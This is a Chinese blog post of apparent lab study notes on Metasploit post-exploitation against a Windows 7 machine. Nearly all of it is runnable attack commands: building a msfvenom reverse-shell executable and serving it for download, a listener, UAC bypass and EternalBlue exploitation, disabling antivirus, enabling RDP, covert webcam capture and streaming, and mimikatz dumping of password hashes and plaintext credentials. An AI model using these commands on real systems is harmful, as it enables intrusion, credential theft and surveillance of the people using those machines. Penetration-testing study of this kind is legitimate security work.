后渗透 | 信息收集

 

反弹连接木马获取shell

    • msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.171.129 LPORT=4444 -f exe > lao.exe
    • python -m SimpleHTTPServer 8080 //通过开启http服务,以供wind7下载lao.exe并允许
    • Msf开启监听:
      • use exploit/multi/handler
      • set payload windows/ meterpreter/reverse_tcp
      • set lhost 192.168.171.129
      • set lport 4444
      • run

权限提升

    • UAC(User Account Control,用户账户控制)
      • 要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,提供权限或管理员密码。
    • Uac绕过提权
      • Exploit/windows/local/ask
      • //高等级执行绕过uac-需要用户确认。
      • use exploit/windows/local/bypassuac
      • //无弹窗的uas绕过
    • 反弹连接提权实战
      • use exploit/windows/local/bypassuac
      • set session 1 #反弹链接的session号
      • exploit
      • session -i 3
      • getsystem
    • 永恒之蓝实战:内核提权漏洞可以得到system权限
      • use exploit/windows/smb/ms17_010_eternalblue
      • set payload windows/x64/meterpreter/reverse_tcp
      • show options
      • set RHOSTS 192.168.171.130 # RHOSTS是目标机的地址
      • exploit
      •  PS:用永恒之蓝打的时候wind7关闭防火墙

信息收集

Run post/windows/gather/forensics/enum_drives

 //获取目标机器的分区情况

Run post/windows/gather/checkvm

//判断是否为虚拟机

Run post/windows/gather/enum_services

//开启那些服务

Run post/windows/gather/enum_applications

 //安装了那些应用

Run post/windows/gather/enum_shares

//查看共享

Run post/windows/gather/dumplinks

 //获取主机最近的系统操作

Run post/windows/gather/enum_applications

//查看补丁

MSF自带的信息收集脚本

Run Scraper

 //偏向于网络

Run Winenum

//偏向于整体的配置

执行类信息收集命令 

Run post/windows/manage/killav

//命令关闭目标机系统杀毒软件。

Run post/windows/manage/enable_rdp

//命令启动目标机的远程桌面协议,也就是常说的3389端口

Run post/windows/mange/autoroute

//命令查看目标机的本地子网情况。

Run post/windows/gather/enum_logged_on_users

//命令列举当前有多少用户登录了自标机

Run post/windows/gather/enum_applications

//命令列举安装在目标机上的应用程序

直观信息收集

Screenshot

//截图。

webcam_list

//查看目标机是否有摄像头。

webcam_snap

//打开目标摄像头,拍一张照片。

webcam_stream

//开启直播模式。

shIl

//进入到目标机的shell下面。

exit

//停止msf会话

文件系统命令

pwd或getwd

查看当前处于目标机的那个目录。

getlwd

查看当前处于本地的那个目录

Is

列出当前目录中的所有文件

cd

切换目录

search -f * .txt -d c:\\

 可以搜索C盘中所有以“.txt”为扩展名的文件,

其中-f参数用于指定搜索文件模式,-d参数用于指定在那个目录下进行搜索

密码信息收集

hash

破解登录密码

meterpreter > load mimikatz

启动mimikatz模块 后面的几条都以这个为前提

meterpreter > help

查看帮助

meterpreter > msv

获取登录密码的hash值

meterpreter > mimikatz_command -f samdump::hashes

获取登录密码的hash值

meterpreter > ssp

获取的是明文信息

meterpreter > tspkg

获取的是明文信息

meterpreter > wdigest

读取内存中存放的账号密码明文信息

meterpreter > kerberos

获取明文密码

 实验结果:

 

posted @ 2020-06-22 22:54  东坡肉肉君  阅读(22)  评论(0)    收藏  举报